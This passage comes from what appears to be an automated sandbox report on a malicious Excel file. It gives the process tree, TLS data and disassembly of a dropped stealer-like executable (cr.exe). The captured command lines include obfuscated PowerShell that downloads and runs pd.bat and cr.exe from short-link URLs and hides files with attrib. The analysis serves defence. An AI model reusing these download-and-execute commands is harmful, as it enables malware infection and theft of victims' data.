                                                        CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027
                                                        Jan 8, 2021 09:08:10.254141092 CET195.201.225.248443192.168.2.2249174CN=telecut.in CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Dec 19 08:52:17 CET 2020 Wed Oct 07 21:21:40 CEST 2020Fri Mar 19 08:52:17 CET 2021 Wed Sep 29 21:21:40 CEST 2021769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                        Jan 8, 2021 09:08:12.033230066 CET104.18.58.219443192.168.2.2249176CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Dec 23 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                        Jan 8, 2021 09:08:26.568110943 CET104.18.58.219443192.168.2.2249177CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Dec 23 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: EXCEL.EXE PID: 2484 Parent PID: 584

                                                        General

                                                        Start time:09:05:53
                                                        Start date:08/01/2021
                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                        Imagebase:0x13f480000
                                                        File size:27641504 bytes
                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 2604 Parent PID: 2484

                                                        General

                                                        Start time:09:05:56
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 2524 Parent PID: 2484

                                                        General

                                                        Start time:09:05:56
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 2492 Parent PID: 2484

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: powershell.exe PID: 2300 Parent PID: 2604

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 2320 Parent PID: 2484

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: powershell.exe PID: 284 Parent PID: 2524

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 2848 Parent PID: 2484

                                                        General

                                                        Start time:09:05:57
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: powershell.exe PID: 2936 Parent PID: 2492

                                                        General

                                                        Start time:09:05:58
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: powershell.exe PID: 2460 Parent PID: 2320

                                                        General

                                                        Start time:09:05:59
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: powershell.exe PID: 2860 Parent PID: 2848

                                                        General

                                                        Start time:09:05:59
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, Author: Florian Roth
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: attrib.exe PID: 152 Parent PID: 2936

                                                        General

                                                        Start time:09:06:04
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\attrib.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                                                        Imagebase:0xff680000
                                                        File size:18432 bytes
                                                        MD5 hash:C65C20C89A255517F11DD18B056CADB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 1924 Parent PID: 2460

                                                        General

                                                        Start time:09:06:10
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: mode.com PID: 2420 Parent PID: 1924

                                                        General

                                                        Start time:09:06:11
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\mode.com
                                                        Wow64 process (32bit):false
                                                        Commandline:mode 18,1
                                                        Imagebase:0xffea0000
                                                        File size:30208 bytes
                                                        MD5 hash:718E86CB060170430D4EF70EE39F93D4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 952 Parent PID: 1924

                                                        General

                                                        Start time:09:06:11
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ver
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 972 Parent PID: 1924

                                                        General

                                                        Start time:09:06:12
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
                                                        Imagebase:0x4a190000
                                                        File size:345088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Chronological Activities

                                                        Analysis Process: powershell.exe PID: 2036 Parent PID: 972

                                                        General

                                                        Start time:09:06:13
                                                        Start date:08/01/2021
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
                                                        Imagebase:0x13f870000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET

                                                        Chronological Activities

                                                        Analysis Process: cr.exe PID: 2240 Parent PID: 2036

                                                        General

                                                        Start time:09:06:19
                                                        Start date:08/01/2021
                                                        Path:C:\Users\user\AppData\Roaming\cr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\AppData\Roaming\cr.exe'
                                                        Imagebase:0x400000
                                                        File size:565248 bytes
                                                        MD5 hash:740E559929463320CB8E0403FD35A097
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 72%, ReversingLabs

                                                        Chronological Activities

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Analysis Process: powershell.exe PID: 2300 Parent PID: 2604 powershell.exeCOMMON

                                                          Executed Functions

                                                          Function 000007FF00261361, Relevance: .1, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2155458402.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d272c9c8e111b9ee1198aabd8fa3db323cf04c161dd4367b651eaab2ea2eebad
                                                          • Instruction ID: dc8d125403b14a82ce691c3c8062e74a1cd4d4800f3fb883c61d9fe536127283
                                                          • Opcode Fuzzy Hash: d272c9c8e111b9ee1198aabd8fa3db323cf04c161dd4367b651eaab2ea2eebad
                                                          • Instruction Fuzzy Hash: B401DCA244E7C10FD3038B389DA16A07FB0AF67204B4A05DBD4C4CF1E3E5191A1AD362
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000007FF0026103C, Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2155458402.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4db49cfa20b5da57a83fc20ba549a9a97ff77573002a02be8c4729f35a4d3099
                                                          • Instruction ID: ebe530c6f59e21c91b1220ba8ac359a57abf62f03b9c42832269ad59abc3ac21
                                                          • Opcode Fuzzy Hash: 4db49cfa20b5da57a83fc20ba549a9a97ff77573002a02be8c4729f35a4d3099
                                                          • Instruction Fuzzy Hash: D501956180E3C28FD3038B745CA9A903F706F17104B5E02D7C490CF0F3E649195AD3A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Analysis Process: powershell.exe PID: 2460 Parent PID: 2320 powershell.exeCOMMON

                                                          Executed Functions

                                                          Function 000007FF002712C1, Relevance: .1, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.2197056944.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c239d92a067d8196ea58df7c6706b2c37f870d26685518153df9892aa73cce8
                                                          • Instruction ID: 2f2c1df79a6ea2a37bfadd17f1b06055ccbc6c4e5d8359bc07e2d05fb3ff102f
                                                          • Opcode Fuzzy Hash: 6c239d92a067d8196ea58df7c6706b2c37f870d26685518153df9892aa73cce8
                                                          • Instruction Fuzzy Hash: 39119D6144E3D54FD70387785C696917FB0AF57214F4E06DBD4C5CF0A3E2581AA9C3A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000007FF0027102A, Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.2197056944.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1eee81760bc5d7c923f7d2909e9367d56ae9b3aeab99a588defd5cb458f4e751
                                                          • Instruction ID: 3728e484926e237b9a4615801a5ecb0302e8102bc74c9988d1c3518a2530a5b2
                                                          • Opcode Fuzzy Hash: 1eee81760bc5d7c923f7d2909e9367d56ae9b3aeab99a588defd5cb458f4e751
                                                          • Instruction Fuzzy Hash: B1B0920085BA9A8AEA0A21752E561D03B515A4A264F8A0282E804894A3D04E0BD942A3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Analysis Process: powershell.exe PID: 2860 Parent PID: 2848 powershell.exeCOMMON

                                                          Executed Functions

                                                          Function 000007FF0027089A, Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2163147072.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d8940fd1a7fc8eebd9128ae38b5f661582f027e3b4b613dd4e9ae14d257bd05
                                                          • Instruction ID: 6d6a99cfba96e2880c89ce9d5ffe89d3a83fd9481f8988924c6351fd19534baf
                                                          • Opcode Fuzzy Hash: 4d8940fd1a7fc8eebd9128ae38b5f661582f027e3b4b613dd4e9ae14d257bd05
                                                          • Instruction Fuzzy Hash: 9EE02010719D0B4FFBA0666C644B3B473C1E755313F54007AE80DC2292DD69D94543C2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Analysis Process: powershell.exe PID: 2036 Parent PID: 972 powershell.exeCOMMON

                                                          Executed Functions

                                                          Function 000007FF002606E5, Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2186996962.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: z#;
                                                          • API String ID: 0-3456323499
                                                          • Opcode ID: 36d82e5fb382448b2325237717cb1019ef97d1f72a6521ee021ca21fae95ae46
                                                          • Instruction ID: c0b71c64dead8f2e723241f33e0dc333065da2b99312de3e9fddb8e964b27be3
                                                          • Opcode Fuzzy Hash: 36d82e5fb382448b2325237717cb1019ef97d1f72a6521ee021ca21fae95ae46
                                                          • Instruction Fuzzy Hash: BD717321A0EBC64FD743977898A96B17FF0DF27210B1A40EBD488CB1A3D9589D59C362
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000007FF00260808, Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2186996962.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc6aa746b9629fb22d3ff135a79b1152d589a6ff6cb5c4ecef2035b56e79cb6d
                                                          • Instruction ID: 2e16afc3651734b24911ec8c4720c8fe051d9e5302e0872abe7911870be03acf
                                                          • Opcode Fuzzy Hash: bc6aa746b9629fb22d3ff135a79b1152d589a6ff6cb5c4ecef2035b56e79cb6d
                                                          • Instruction Fuzzy Hash: E921A110A1EBC64FE753973858956717FE0EF57211B1900FBE488CB1A3C9589C4983A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Analysis Process: cr.exe PID: 2240 Parent PID: 2036 cr.exeCOMMON

                                                          Executed Functions

                                                          Function 00425760, Relevance: 274.5, APIs: 42, Strings: 108, Instructions: 11980threadsynchronizationsleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00425765
                                                          • CoInitialize.OLE32(00000000), ref: 00425786
                                                            • Part of subcall function 00434F05: OpenMutexA.KERNEL32 ref: 00434F56
                                                            • Part of subcall function 00434F05: CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00434F63
                                                          • CoUninitialize.OLE32 ref: 00431CE9
                                                            • Part of subcall function 00437B2C: GetCurrentProcess.KERNEL32(00000008,?), ref: 00437B3E
                                                            • Part of subcall function 00437B2C: OpenProcessToken.ADVAPI32(00000000), ref: 00437B45
                                                            • Part of subcall function 00437B2C: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00437B5F
                                                            • Part of subcall function 00437B2C: GetLastError.KERNEL32 ref: 00437B69
                                                            • Part of subcall function 00437B2C: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00437B79
                                                            • Part of subcall function 00437B2C: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00437B8D
                                                            • Part of subcall function 00437B2C: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437BA1
                                                            • Part of subcall function 00437B2C: GlobalFree.KERNEL32(00000000), ref: 00437BC1
                                                          • GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 004257CA
                                                          • GetLocaleInfoA.KERNELBASE(00000000), ref: 004257D1
                                                            • Part of subcall function 00437BD1: __EH_prolog.LIBCMT ref: 00437BD6
                                                            • Part of subcall function 00437BD1: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00437C37
                                                            • Part of subcall function 00437BD1: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00437C51
                                                            • Part of subcall function 00437BD1: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00437CC5
                                                            • Part of subcall function 00437BD1: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00437CD7
                                                            • Part of subcall function 00437BD1: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00437CF2
                                                            • Part of subcall function 00437BD1: CloseHandle.KERNEL32(?), ref: 00437CFF
                                                            • Part of subcall function 00437BD1: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00437D12
                                                            • Part of subcall function 00410D75: __EH_prolog.LIBCMT ref: 00410D7A
                                                            • Part of subcall function 00411173: __EH_prolog.LIBCMT ref: 00411178
                                                            • Part of subcall function 00433035: __EH_prolog.LIBCMT ref: 0043303A
                                                            • Part of subcall function 00433035: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047913B,00000000), ref: 00433083
                                                            • Part of subcall function 00433035: WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?,?,?,?,0047913B,00000000), ref: 00433150
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          • Sleep.KERNELBASE(00001388,GET,0047913B), ref: 00425D3F
                                                          • GetUserNameA.ADVAPI32(?,00000101), ref: 00425FC0
                                                            • Part of subcall function 00433035: WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047913B,00000000), ref: 00433227
                                                            • Part of subcall function 00433035: _strlen.LIBCMT ref: 004332C7
                                                            • Part of subcall function 00433035: _strlen.LIBCMT ref: 004332D1
                                                            • Part of subcall function 00433035: WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047913B,00000000), ref: 004332E8
                                                            • Part of subcall function 00433035: WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047913B,00000000), ref: 004332FA
                                                            • Part of subcall function 00433035: WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,?,?,0047913B,00000000), ref: 00433312
                                                            • Part of subcall function 00433035: WinHttpReadData.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,0047913B,00000000), ref: 00433347
                                                          • _strlen.LIBCMT ref: 00426266
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00012EFA,00000000,00000000,00000000), ref: 004264E6
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00013396,00000000,00000000,00000000), ref: 004264F8
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00013A83,00000000,00000000,00000000), ref: 0042650A
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000141D0,00000000,00000000,00000000), ref: 0042651C
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000149F1,00000000,00000000,00000000), ref: 0042652E
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00014CBC,00000000,00000000,00000000), ref: 00426540
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_0001510A,00000000,00000000,00000000), ref: 00426552
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_0001536E,00000000,00000000,00000000), ref: 00426564
                                                            • Part of subcall function 00422B5C: __EH_prolog.LIBCMT ref: 00422B61
                                                            • Part of subcall function 0041145D: ___std_fs_get_stats@16.LIBCPMT ref: 0041147D
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_0000CB61,?,00000000,00000000), ref: 0042676E
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00426781
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00023CBB,00000000,00000000,00000000), ref: 00426797
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004267A4
                                                          • _strlen.LIBCMT ref: 00426289
                                                            • Part of subcall function 00431E88: __EH_prolog.LIBCMT ref: 00431E8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Create$Thread$H_prologHttp$Open$Token$Process_strlen$DataDeallocateGlobalInformationMutexNameObjectRequestSingleUserWait$AllocAvailableCloseConnectConvertCurrentDefaultDuplicateErrorFileFirstFreeHandleInfoInitializeLastLocaleModuleProcess32QueryReadReceiveResponseSendSleepSnapshotStringToolhelp32Uninitialize___std_fs_get_stats@16
                                                          • String ID: !$!$$$$$$$%$%$%$%$%*$%-*-$($($)$-$-$-fT_JTW$.$/$/error.php$0$2$3$442964986e275016d0e4a3e3ec40e0d6 $5$5$5$6$6$6$8$;$=$=$><$@$A$A$C$C$C$D$D$E$GET$H$I$J$J$M$N$O$P$POST$T$T$U$U$V$W$X~>e2+76$\$]$^$_$_id$`$a$b$b$bje$e$f$fh$f|k\$gate/$gmn$j$j$jy~x$k$k$location$machineinfo.txt$o$o$p2UZSfO0NScL56aJyJpLvMwHBuGfS5Krn8VfshnPG7BYXExKg3FMbQ== $q$q$q$qSVdAbi/K2pP5PzejMhd4MMaCaHKR9e80ZoKsFw= $s$screen.jpeg$sqlite3.dll$u$v$v$w$w$w$y$z${$|k\$}$~$#$Em
                                                          • API String ID: 724023769-3116968881
                                                          • Opcode ID: 8e9ade0363647bce9405908d87d26cfec593cb26a5dacc1ed98c5771db2000e0
                                                          • Instruction ID: 821ab29258fdcae88f00aa6ba13ba0c3aa8f1f0bd604a3dbf04a37e2a7e9d9a3
                                                          • Opcode Fuzzy Hash: 8e9ade0363647bce9405908d87d26cfec593cb26a5dacc1ed98c5771db2000e0
                                                          • Instruction Fuzzy Hash: 70345030D052A89ADB25E766CC52BDDB7745F2A308F4400DEA549376D2DF782B88CF1A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040B831, Relevance: 34.1, APIs: 14, Strings: 5, Instructions: 844libraryloaderencryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040B836
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B881
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040B8B3
